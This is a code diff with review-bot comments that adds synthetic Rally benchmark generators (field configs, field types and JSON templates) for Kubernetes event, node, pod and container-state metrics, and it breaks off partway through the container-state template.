diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/event-benchmark.yml new file mode 100644 index 00000000000..a53369a36fb --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark of 20000 kubernetes.event event ingested +data_stream: + name: event +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./event-benchmark/template.ndjson + config: + path: ./event-benchmark/config.yml + fields: + path: ./event-benchmark/fields.yml diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/config.yml new file mode 100644 index 00000000000..ac3dbf295c7 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/config.yml 
@@ -0,0 +1,40 @@ +fields: + - name: timestamp + period: 60m + - name: event_count + range: + min: 1 + max: 10000 + - name: event_duration + range: + min: 1 + max: 10000000 + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: duration_end + enum: ["-30m", "-20m", "-10m", "-40m"] + - name: involved_object_kind + enum: ["Pod", "Node"] + - name: message_normal + value: "Node minikube status is now:" + - name: message_warning_backoff + value: "Back-off restarting failed container" + - name: message_warning_failed + enum: + - "Error: ErrImagePull" + - "Error: ImagePullBackOff" + - "Failed to pull image 'mylogin/posts:0.0.1': rpc error: code = Unknown desc = Error response from daemon: pull access denied for mylogin/posts, repository does not exist or may require 'docker login'" + - name: type + enum: ["Normal", "Warning"] + - name: reason_normal + enum: ["NodeHasSufficientDisk", "NodeHasSufficientMemory", "NodeHasNoDiskPressure", "NodeHasSufficientPID"] + - name: reason_warning + enum: ["Failed", "BackOff"] + - name: rangeofid + range: + min: 0 + max: 10000 + - name: metadata_resource_version + range: + min: 400000 + max: 500000 diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/fields.yml new file mode 100644 index 00000000000..72b271d84bd --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/fields.yml 
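Review bot: The event template later in this diff calls `generate` for `involved_object_name`, `metadata_generate_name` and `reason`, but this config.yml gives them no `enum` or `value`, so they presumably fall back to the generator's default for a keyword (an arbitrary string), which makes `involved_object.name` unrealistic next to the curated `reason_normal`/`reason_warning` enums. If realistic names matter for the benchmark, add an enum for `involved_object_name` (for example `enum: ["demo-pod", "minikube"]`, a constructed sample) and drop the `reason` entry, which the template assigns but never emits. A one-line comment on `duration_end` saying that its offsets are deliberately smaller than `duration_start`'s, so `last_occurrence` never precedes `first_occurrence`, would document an invariant the template silently relies on.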
@@ -0,0 +1,38 @@
+- name: Ip
+ type: ip
+- name: timestamp
+ type: date
+- name: duration_start
+ type: keyword
+- name: duration_end
+ type: keyword
+- name: event_count
+ type: long
+- name: event_duration
+ type: long
+- name: involved_object_kind
+ type: keyword
+- name: involved_object_name
+ type: keyword
+- name: message_normal
+ type: keyword
+- name: message_warning_backoff
+ type: keyword
+- name: message_warning_failed
+ type: keyword
+- name: reason_normal
+ type: keyword
+- name: reason_warning
+ type: keyword
+- name: metadata_generate_name
+ type: keyword
+- name: metadata_timestamp_created
+ type: date
+- name: reason
+ type: keyword
+- name: type
+ type: keyword
+- name: rangeofid
+ type: integer
+- name: metadata_resource_version
+ type: long
diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/template.ndjson
new file mode 100644
index 00000000000..ddb96a75207
--- /dev/null
+++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/template.ndjson
@@ -0,0 +1,139 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_count := generate "event_count" }} +{{- $event_duration := generate "event_duration" }} +{{- $duration_start := generate "duration_start" }} +{{- $duration_end := generate "duration_end" }} +{{- $first_occurrence := generate "timestamp" | date_modify (print $duration_start) }} +{{- $last_occurrence := generate "timestamp" | date_modify (print $duration_end) }} +{{- $involved_object_kind := generate "involved_object_kind" }} +{{- $involved_object_name := generate "involved_object_name" }} +{{- $message_normal := generate "message_normal" }} +{{- $message_warning_backoff := generate "message_warning_backoff" }} +{{- $message_warning_failed := generate "message_warning_failed" }} +{{- $reason_normal := generate "reason_normal" }} +{{- $reason_warning := generate "reason_warning" }} +{{- $metadata_generate_name := generate "metadata_generate_name" }} +{{- $metadata_resource_version := generate "metadata_resource_version" }} +{{- $reason := generate "reason" }} +{{- $type := generate "type" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $eventid := div $rangeofid 110 -}} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.000Z07:00"}}", + "metricset": { + "name": "event" + }, + "agent": { + "type": "metricbeat", + "version": "8.8.0", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "kubernetes-scale-123456" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "ecs": { + "version": "8.5.0" + }, + "event": { + "duration": {{ $event_duration }}, + "dataset": "kubernetes.event", + "module": "kubernetes" + }, + "data_stream": { + "namespace": "ep", + "type": "metrics", + "dataset": "kubernetes.event" + }, + "service": { + "type": "kubernetes" + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + 
"kubernetes": { + "event": { + "metadata": { + "uid": "host-{{ $eventid }}", + "resource_version": "{{ $metadata_resource_version }}", + "timestamp": { + "created": "{{ $first_occurrence.Format "2006-01-02T15:04:05.000Z07:00" }}" + }, + "name": "host-{{ $eventid }}", + "namespace": "demo-{{ $eventid }}", + "self_link": "/api/v1/namespaces/events/host-{{ $eventid }}", + "generate_name": "{{ $metadata_generate_name }}", + {{- if eq $type "Normal"}} + "annotations": { + "kubectl_kubernetes_io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"involvedObject\":{\"kind\":\"{{ $involved_object_kind }}\"},\"kind\":\"Event\",\"message\":\"{{ $message_normal }} {{ $reason_normal }}\",\"metadata\":{\"annotations\":{},\"name\":\"host-{{ $eventid }}\",\"namespace\":\"demo-{{ $eventid }}\"},\"type\":\"{{ $type }}\"}\n" + } + {{- else if eq $type "Warning"}} + {{- if eq $reason_warning "BackOff"}} + "annotations": { + "kubectl_kubernetes_io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"involvedObject\":{\"kind\":\"{{ $involved_object_kind }}\"},\"kind\":\"Event\",\"message\":\"{{ $message_warning_backoff }}\",\"metadata\":{\"annotations\":{},\"name\":\"host-{{ $eventid }}\",\"namespace\":\"demo-{{ $eventid }}\"},\"type\":\"{{ $type }}\"}\n" + } + {{- else if eq $reason_warning "Failed"}} + "annotations": { + "kubectl_kubernetes_io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"involvedObject\":{\"kind\":\"{{ $involved_object_kind }}\"},\"kind\":\"Event\",\"message\":\"{{ $message_warning_failed }}\",\"metadata\":{\"annotations\":{},\"name\":\"host-{{ $eventid }}\",\"namespace\":\"demo-{{ $eventid }}\"},\"type\":\"{{ $type }}\"}\n" + } + {{- end}} + {{- end}} + }, + "timestamp": { + "first_occurrence": "{{ $first_occurrence.Format "2006-01-02T15:04:05.000Z07:00" }}", + "last_occurrence": "{{ $last_occurrence.Format "2006-01-02T15:04:05.000Z07:00" }}" + }, + {{- if eq $type "Normal"}} + "message": "{{ $message_normal }} {{ $reason_normal }}", + "reason": "{{ 
$reason_normal }}", + "type": "{{ $type }}", + "count": {{ $event_count }}, + {{- else if eq $type "Warning"}} + {{- if eq $reason_warning "BackOff"}} + "message": "{{ $message_warning_backoff }}", + "reason": "{{ $reason_warning }}", + "type": "{{ $type }}", + "count": {{ $event_count }}, + {{- else if eq $reason_warning "Failed"}} + "message": "{{ $message_warning_failed }}", + "reason": "{{ $reason_warning }}", + "type": "{{ $type }}", + "count": {{ $event_count }}, + {{- end}} + {{- end}} + "source": { + "host": "host-{{ $eventid }}", + "component": "demo-component-{{ $eventid }}" + }, + "involved_object": { + "api_version": "v1", + "resource_version": "{{ $metadata_resource_version }}", + "name": "{{ $involved_object_name }}", + "kind": "{{ $involved_object_kind }}", + "uid": "host-{{ $eventid }}" + } + } + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/node-benchmark.yml new file mode 100644 index 00000000000..73df163f6bf --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 kubernetes.node events ingested +data_stream: + name: node +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./node-benchmark/template.ndjson + config: + path: ./node-benchmark/config.yml + fields: + path: ./node-benchmark/fields.yml 
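Review bot: The rendered document is only valid JSON while the `type` and `reason_warning` enums in config.yml stay exhaustive: the `"generate_name": ...,` member and the `timestamp` block both end with a comma and rely on one of the `{{- if}}`/`{{- else if}}` branches emitting the next member, so a new enum value or a typo yields a trailing comma and a document the ingest side rejects. An `{{- else}}` branch emitting `"annotations": {}` and the `message`/`reason`/`type`/`count` members, or moving the conditional members to the end of their objects, removes that dependency. The message enums are also interpolated unescaped into the `last-applied-configuration` value, which is itself an escaped JSON string; the current values contain no `"` or `\`, so a comment such as `{{- /* message enums must not contain double quotes or backslashes: they are embedded in an escaped JSON string */ -}}` at the top would keep a future edit from breaking the fixture. `$reason := generate "reason"` is assigned but never used and `metadata_timestamp_created` is declared in fields.yml but never generated; both can go. `@timestamp`, `first_occurrence` and `last_occurrence` each come from a separate `generate "timestamp"` draw, which presumably is intended but deserves a comment if so.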
diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/config.yml new file mode 100644 index 00000000000..44fb59b4a40 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/config.yml @@ -0,0 +1,97 @@ +fields: + - name: timestamp + period: 60m + - name: rangeofid + range: + min: 0 + max: 10000 + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: event_duration + range: + min: 1 + max: 1000000 + - name: cpu_usage_core_ns + range: + min: 1 + max: 1000000000000 + - name: nanocores + range: + min: 1 + max: 1000000 + - name: memory_available_bytes + range: + min: 100000000001 + max: 200000000000 + - name: memory_usage_bytes + range: + min: 10000000001 + max: 90000000000 + - name: memory_rss_bytes + range: + min: 1 + max: 1000000000 + - name: memory_workingset_bytes + range: + min: 1000000000 + max: 9000000000 + - name: pagefaults + range: + min: 1 + max: 100000 + - name: majorpagefaults + range: + min: 0 + max: 100 + - name: network_rx_bytes + range: + min: 100000000 + max: 900000000 + - name: network_rx_errors + range: + min: 0 + max: 100 + - name: network_tx_bytes + range: + min: 10000000 + max: 90000000 + - name: network_tx_errors + range: + min: 0 + max: 100 + - name: fs_capacity_bytes + range: + min: 10000000000 + max: 20000000000 + - name: fs_available_bytes + range: + min: 1000000000 + max: 9000000000 + - name: fs_used_bytes + range: + min: 1000000000 + max: 9000000000 + - name: fs_inodes_used + range: + min: 100000 + max: 900000 + - name: fs_inodes_count + range: + min: 1000000 + max: 9000000 + - name: fs_inodes_free + range: + min: 1000000 + max: 9000000 + - name: runtime_imagefs_capacity_bytes + range: + min: 10000000000 + max: 20000000000 + - name: runtime_imagefs_available_bytes + range: + min: 1000000000 + max: 9000000000 + - name: runtime_imagefs_used_bytes + range: + min: 1000000000 + max: 9000000000 
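Review bot: The ranges for `fs_used_bytes` (1e9–9e9), `fs_available_bytes` (1e9–9e9) and `fs_capacity_bytes` (1e10–2e10) are drawn independently, so used + available exceeds capacity in a share of documents, and the same holds for `fs_inodes_used` + `fs_inodes_free` versus `fs_inodes_count`; any dashboard deriving a usage ratio from these will show values above 100%. If the corpus is only meant to exercise ingest throughput that is harmless, but say so at the top of the file with `# ranges are independent; derived ratios are not meaningful`, or narrow the ranges so the sums cannot overflow.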
diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/fields.yml
new file mode 100644
index 00000000000..f078cff60f8
--- /dev/null
+++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/fields.yml
@@ -0,0 +1,56 @@
+- name: Ip
+ type: ip
+- name: timestamp
+ type: date
+- name: rangeofid
+ type: integer
+- name: event_duration
+ type: long
+- name: duration_start
+ type: keyword
+- name: cpu_usage_core_ns
+ type: long
+- name: nanocores
+ type: long
+- name: cpu_usage_core_ns
+ type: long
+- name: nanocores
+ type: long
+- name: memory_available_bytes
+ type: long
+- name: memory_usage_bytes
+ type: long
+- name: memory_rss_bytes
+ type: long
+- name: memory_workingset_bytes
+ type: long
+- name: pagefaults
+ type: long
+- name: majorpagefaults
+ type: long
+- name: network_rx_bytes
+ type: long
+- name: network_rx_errors
+ type: long
+- name: network_tx_bytes
+ type: long
+- name: network_tx_errors
+ type: long
+- name: fs_capacity_bytes
+ type: long
+- name: fs_available_bytes
+ type: long
+- name: fs_used_bytes
+ type: long
+- name: fs_inodes_used
+ type: long
+- name: fs_inodes_count
+ type: long
+- name: fs_inodes_free
+ type: long
+- name: runtime_imagefs_capacity_bytes
+ type: long
+- name: runtime_imagefs_available_bytes
+ type: long
+- name: runtime_imagefs_used_bytes
+ type: long
diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/template.ndjson
new file mode 100644
index 00000000000..589e0a98068
--- /dev/null
+++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/template.ndjson
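Review bot: `cpu_usage_core_ns` and `nanocores` are each declared twice in this fields.yml, once after `duration_start` and again immediately after the first `nanocores`; delete the second pair so the field list stays a set. Whether the generator tolerates duplicate names is not visible here, but at best the repeat is dead weight and at worst the later declaration shadows the earlier one.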
@@ -0,0 +1,160 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_duration := generate "event_duration" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $nodeid := div $rangeofid 110 -}} +{{- $duration_start := generate "duration_start" }} +{{- $startTime := generate "timestamp" | date_modify (print $duration_start) }} +{{- $memory_available_bytes := generate "memory_available_bytes" }} +{{- $memory_usage_bytes := generate "memory_usage_bytes" }} +{{- $memory_rss_bytes := generate "memory_rss_bytes" }} +{{- $memory_workingset_bytes := generate "memory_workingset_bytes" }} +{{- $pagefaults := generate "pagefaults" }} +{{- $majorpagefaults := generate "majorpagefaults" }} +{{- $network_rx_bytes := generate "network_rx_bytes" }} +{{- $network_rx_errors := generate "network_rx_errors" }} +{{- $network_tx_bytes := generate "network_tx_bytes" }} +{{- $network_tx_errors := generate "network_tx_errors" }} +{{- $fs_capacity_bytes := generate "fs_capacity_bytes" }} +{{- $fs_available_bytes := generate "fs_available_bytes" }} +{{- $fs_used_bytes := generate "fs_used_bytes" }} +{{- $fs_inodes_used := generate "fs_inodes_used" }} +{{- $fs_inodes_count := generate "fs_inodes_count" }} +{{- $fs_inodes_free := generate "fs_inodes_free" }} +{{- $runtime_imagefs_capacity_bytes := generate "runtime_imagefs_capacity_bytes" }} +{{- $runtime_imagefs_available_bytes := generate "runtime_imagefs_available_bytes" }} +{{- $runtime_imagefs_used_bytes := generate "runtime_imagefs_used_bytes" }} +{{- $cpu_usage_core_ns := generate "cpu_usage_core_ns" }} +{{- $nanocores := generate "nanocores" }} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", + "event": { + "dataset": "kubernetes.node", + "module": "kubernetes", + "agent_id_status": "verified", + "duration": {{ $event_duration }} + }, + "data_stream": { + "dataset": "kubernetes.node", + "namespace": "ep", + "type": "metrics" + }, + "service": { + "type": "kubernetes", + "address": 
"kubernetes-scale-123456:10250" + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + }, + "metricset": { + "name": "node", + "period": 10000 + }, + "kubernetes": { + "labels": { + "app":"demo", + "pod-template-hash":"{{ $rangeofid }}", + "app-2":"demo-2", + "app-1":"demo-1" + }, + "node": { + "memory": { + "available": { + "bytes": {{ $memory_available_bytes }} + }, + "usage": { + "bytes": {{ $memory_usage_bytes }} + }, + "workingset": { + "bytes": {{ $memory_workingset_bytes }} + }, + "rss": { + "bytes": {{ $memory_rss_bytes }} + }, + "pagefaults": {{ $pagefaults }}, + "majorpagefaults": {{ $majorpagefaults }} + }, + "network": { + "rx": { + "bytes": {{ $network_rx_bytes }}, + "errors": {{ $network_rx_errors }} + }, + "tx": { + "bytes": {{ $network_tx_bytes }}, + "errors": {{ $network_tx_errors }} + } + }, + "fs": { + "available": { + "bytes": {{ $fs_available_bytes }} + }, + "capacity": { + "bytes": {{ $fs_capacity_bytes }} + }, + "used": { + "bytes": {{ $fs_used_bytes }} + }, + "inodes": { + "count": {{ $fs_inodes_count }}, + "used": {{ $fs_inodes_used }}, + "free": {{ $fs_inodes_free }} + } + }, + "runtime": { + "imagefs": { + "capacity": { + "bytes": {{ $runtime_imagefs_capacity_bytes }} + }, + "used": { + "bytes": {{ $runtime_imagefs_used_bytes }} + }, + "available": { + "bytes": {{ $runtime_imagefs_available_bytes }} + } + } + }, + "start_time": "{{$startTime.Format "2006-01-02T15:04:05.000Z"}}", + "cpu": { + "usage": { + "core": { + "ns": {{ $cpu_usage_core_ns }} + }, + "nanocores": {{ $nanocores }} + } + } + } + }, + "agent": { + "name": "kubernetes-scale-123456", + "type": "metricbeat", + "version": "8.8.0", + "ephemeral_id": 
"22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "ecs": { + "version": "8.5.0" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml index e55a8d9e17c..dd23917b3de 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml @@ -1,10 +1,10 @@ --- -description: Benchmark 864000 kubernetes.pod events ingested +description: Benchmark 8640000 kubernetes.pod events ingested data_stream: name: pod corpora: generator: - total_events: 864000 + total_events: 8640000 template: type: gotext path: ./pod-benchmark/template.ndjson diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml index 316bd153cd7..6a7b3710eca 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml @@ -37,8 +37,16 @@ fields: range: min: 9000 max: 10000 - - name: Percentage + - name: PercentageMemory range: - min: 0 - max: 5000 - fuzziness: 0.005 + min: 0.0 + max: 1.0 + - name: PercentageCPU + range: + min: 0.0 + max: 1.0 + - name: Nanocores + range: + min: 100000 + max: 9000000 + cardinality: 10000 diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml index 0b9b61742cc..b5f6a7dd17f 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml 
@@ -26,7 +26,11 @@ type: integer - name: Ip type: ip -- name: Percentage +- name: PercentageMemory type: double +- name: PercentageCPU + type: double +- name: Nanocores + type: integer - name: agent.snapshot type: boolean diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson index df79a674fae..bb8a89c0e6e 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson @@ -8,7 +8,9 @@ {{- $txbytes := generate "container.network.egress.bytes" }} {{- $rangeofid := generate "rangeofid" }} {{- $nodeid := div $rangeofid 110 -}} -{{- $pct := generate "Percentage" }} +{{- $pctmem := generate "PercentageMemory" }} +{{- $pctcpu := generate "PercentageCPU" }} +{{- $nanocores := generate "Nanocores" | mul 1000 -}} { "@timestamp": "{{$timestamp.Format `2006-01-02T15:04:05.999999Z07:00`}}", "container":{ "network":{ @@ -60,11 +62,11 @@ "major_page_faults":0, "usage":{ "node":{ - "pct": "{{divf $pct 1000000}}" + "pct": "{{$pctmem}}" }, "bytes": "{{generate `Bytes`}}", "limit":{ - "pct":"{{divf $pct 1000000}}" + "pct":"{{$pctmem}}" } }, "available":{ @@ -74,7 +76,7 @@ "working_set":{ "bytes": "{{generate `Bytes`}}", "limit":{ - "pct": "{{divf $pct 1000000}}" + "pct": "{{$pctmem}}" } } }, @@ -83,11 +85,11 @@ "cpu":{ "usage":{ "node":{ - "pct":0 + "pct":{{$pctcpu}} }, - "nanocores":0, + "nanocores":{{$nanocores}}, "limit":{ - "pct":0 + "pct":{{$pctcpu}} } } }, diff --git a/packages/kubernetes/_dev/benchmark/rally/state_container-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/state_container-benchmark.yml new file mode 100644 index 00000000000..8d7aa6fa62e --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/state_container-benchmark.yml 
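Review bot: Memory percentages are still emitted as JSON strings (`"pct": "{{$pctmem}}"`) while the new CPU lines emit bare numbers (`"pct":{{$pctcpu}}`), so fields of the same double type arrive with two JSON types in one document. Elasticsearch coerces numeric strings by default, but the container-benchmark template in this same commit emits both unquoted; drop the quotes here, `"pct": {{$pctmem}}`, for consistency. The hunks show only the memory `usage`/`working_set` and `cpu` sections; the rest of the template lies outside them.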
@@ -0,0 +1,14 @@
+---
+description: Benchmark 20000 kubernetes.state_container events ingested
+data_stream:
+ name: state_container
+corpora:
+ generator:
+ total_events: 20000
+ template:
+ type: gotext
+ path: ./statecontainer-benchmark/template.ndjson
+ config:
+ path: ./statecontainer-benchmark/config.yml
+ fields:
+ path: ./statecontainer-benchmark/fields.yml
diff --git a/packages/kubernetes/_dev/benchmark/rally/state_pod-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/state_pod-benchmark.yml
new file mode 100644
index 00000000000..f3720822558
--- /dev/null
+++ b/packages/kubernetes/_dev/benchmark/rally/state_pod-benchmark.yml
@@ -0,0 +1,14 @@
+---
+description: Benchmark 20000 kubernetes.state_pod events ingested
+data_stream:
+ name: state_pod
+corpora:
+ generator:
+ total_events: 20000
+ template:
+ type: gotext
+ path: ./statepod-benchmark/template.ndjson
+ config:
+ path: ./statepod-benchmark/config.yml
+ fields:
+ path: ./statepod-benchmark/fields.yml
diff --git a/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/config.yml
new file mode 100644
index 00000000000..e86fba936de
--- /dev/null
+++ b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/config.yml
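Review bot: The new definitions are named `state_container-benchmark.yml` and `state_pod-benchmark.yml` but point at `statecontainer-benchmark/` and `statepod-benchmark/`, whereas `event-benchmark.yml`/`event-benchmark/` and `node-benchmark.yml`/`node-benchmark/` keep file and directory names identical. Renaming the two directories to `state_container-benchmark/` and `state_pod-benchmark/` (and the three `path:` entries in each file) keeps the one-to-one convention and means a search for the `state_pod` data stream also finds its corpus.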
@@ -0,0 +1,49 @@ +fields: + - name: timestamp + period: 60m + - name: event_duration + range: + min: 1 + max: 1000000 + - name: status_phase + enum: ["running", "waiting", "terminated"] + - name: status_ready + enum: ["true", "false"] + - name: restarts + range: + min: 1 + max: 100 + - name: reason_waiting + enum: ["ContainerCreating", "CrashLoopBackoff", "ErrImagePull", "ImagePullBackoff"] + - name: reason_terminated + enum: ["Completed", "ContainerCannotRun", "Error", "OOMKilled"] + - name: cpu_limit_cores + range: + min: 4 + max: 6 + - name: cpu_request_cores + range: + min: 0 + max: 3 + - name: memory_limit_bytes + range: + min: 1000000000 + max: 16000000000 + - name: memory_request_bytes + range: + min: 500000000 + max: 999000000 + - name: rangeofid + range: + min: 0 + max: 10000 + - name: cpu_limit_nanocores + range: + min: 10000000 + max: 30000000 + - name: cpu_request_nanocores + range: + min: 100000 + max: 300000 + - name: container_name + enum: ["web", "default-http-backend", "dnsmasq", "csi-driver", "web", "web", "web", "prometheus", "konnectivity-agent", "sidecar", "kubedns", "metrics-server-nanny", "web", "web", "fluentbit", "autoscaler", "gke-metrics-agent", "elastic-agent", "web", "kube-state-metrics", "metrics-server", "fluentbit", "elastic-agent", "web", "prometheus-to-sd-exporter"] diff --git a/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/fields.yml new file mode 100644 index 00000000000..688e8233c14 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/fields.yml 
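Review bot: `cpu_limit_cores` (4–6) and `cpu_limit_nanocores` (1e7–3e7) are drawn independently and disagree by two orders of magnitude — 4 cores is 4e9 nanocores — and the same holds for `cpu_request_cores` (0–3) against `cpu_request_nanocores` (1e5–3e5); either derive nanocores in the template (`"nanocores": {{ mul $cpu_limit_cores 1000000000 }}`) or align the ranges. The `container_name` enum lists `"web"` eight times, which presumably weights the distribution toward web containers; a comment such as `# "web" repeated to skew the distribution` would make that intent explicit rather than looking like a copy-paste slip.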
@@ -0,0 +1,32 @@
+- name: Ip
+ type: ip
+- name: timestamp
+ type: date
+- name: rangeofid
+ type: integer
+- name: event_duration
+ type: long
+- name: container_name
+ type: keyword
+- name: status_phase
+ type: keyword
+- name: status_ready
+ type: boolean
+- name: restarts
+ type: integer
+- name: reason_waiting
+ type: keyword
+- name: reason_terminated
+ type: keyword
+- name: cpu_limit_cores
+ type: float
+- name: cpu_request_cores
+ type: float
+- name: memory_limit_bytes
+ type: long
+- name: memory_request_bytes
+ type: long
+- name: cpu_limit_nanocores
+ type: long
+- name: cpu_request_nanocores
+ type: long
diff --git a/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/template.ndjson
new file mode 100644
index 00000000000..ff48f6e38ae
--- /dev/null
+++ b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/template.ndjson
@@ -0,0 +1,174 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_duration := generate "event_duration" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $nodeid := div $rangeofid 110 -}} +{{- $container_name := generate "container_name" }} +{{- $status_phase := generate "status_phase" }} +{{- $status_ready := generate "status_ready" }} +{{- $restarts := generate "restarts" }} +{{- $reason_waiting := generate "reason_waiting" }} +{{- $reason_terminated := generate "reason_terminated" }} +{{- $cpu_limit_cores := generate "cpu_limit_cores" }} +{{- $cpu_request_cores := generate "cpu_request_cores" }} +{{- $memory_limit_bytes := generate "memory_limit_bytes" }} +{{- $memory_request_bytes := generate "memory_request_bytes" }} +{{- $cpu_limit_nanocores := generate "cpu_limit_nanocores" }} +{{- $cpu_request_nanocores := generate "cpu_request_nanocores" }} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", + "container": { + "image": { + "name": "k8s.gcr.io/coredns/coredns:v1.8.0" + }, + "runtime": "containerd", + "id": "container-{{ $rangeofid }}" + }, + "kubernetes": { + "container": { + "memory": { + "request": { + "bytes": {{ $memory_request_bytes }} + }, + "limit": { + "bytes": {{ $memory_limit_bytes }} + } + }, + "name": "{{ $container_name }}", + "cpu": { + "request": { + "cores": {{ $cpu_request_cores }}, + "nanocores": {{ $cpu_request_nanocores }} + }, + "limit": { + "cores": {{ $cpu_limit_cores }}, + "nanocores": {{ $cpu_limit_nanocores }} + } + }, + "id": "container-{{ $rangeofid }}", + "status": { + "phase": "{{ $status_phase }}", + {{- if eq $status_phase "running"}} + "ready": "true", + "last_terminated_reason": "{{ $reason_terminated }}", + {{- else if eq $status_phase "terminated"}} + "ready": "false", + "reason": "{{ $reason_terminated }}", + {{- else if eq $status_phase "waiting"}} + "ready": "{{ $status_ready }}", + "reason": "{{ $reason_waiting }}", + {{- end}} + "restarts": {{ $restarts }} + } + }, + "node": { + 
